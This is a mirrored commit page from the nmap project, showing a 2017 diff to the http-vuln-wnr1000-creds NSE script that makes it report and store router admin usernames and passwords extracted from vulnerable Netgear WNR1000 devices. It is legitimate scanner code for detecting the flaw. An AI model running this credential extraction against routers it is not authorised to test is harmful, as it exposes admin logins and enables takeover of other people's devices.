PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-06 04:31:29 +00:00
Code Issues Projects Releases Wiki Activity

Report and record recovered creds in http-vuln-wnr1000-creds

Browse Source
This commit is contained in:
dmiller
2017-03-24 16:20:02 +00:00
parent 3220cbd62b
commit 312fbbfcf1
1 changed files with 8 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
scripts/http-vuln-wnr1000-creds.nse
View File

@@ -3,6 +3,7 @@ local shortport = require "shortport"
local stdnse = require "stdnse" local stdnse = require "stdnse"
local string = require "string" local string = require "string"
local vulns = require "vulns" local vulns = require "vulns"
local creds = require "creds"
description = [[ description = [[
A vulnerability has been discovered in WNR 1000 series that allows an attacker A vulnerability has been discovered in WNR 1000 series that allows an attacker
@@ -85,9 +86,13 @@ action = function(host, port)
local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username</td>.+align="left">(.+)</td>.+Router Admin') local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username</td>.+align="left">(.+)</td>.+Router Admin')
local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password</td>.+align="left">(.+)</td>.+MNUText') local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password</td>.+align="left">(.+)</td>.+MNUText')
if (netgear_username ~= nil and netgear_password ~= nil) then if (netgear_username ~= nil and netgear_password ~= nil) then
stdnse.debug1("username : %s", escape(netgear_username)) vuln.exploit_results = {
stdnse.debug1("password : %s", escape(netgear_password)) ("username: %s"):format(netgear_username),
vuln.state = vulns.STATE.VULN ("password: %s"):format(netgear_password),
}
local c = creds.Credentials:new(SCRIPT_NAME, host, port)
c:add(netgear_username, netgear_password, creds.State.VALID)
vuln.state = vulns.STATE.VULN
else else
stdnse.debug1("We haven't been able to get username/password") stdnse.debug1("We haven't been able to get username/password")
end end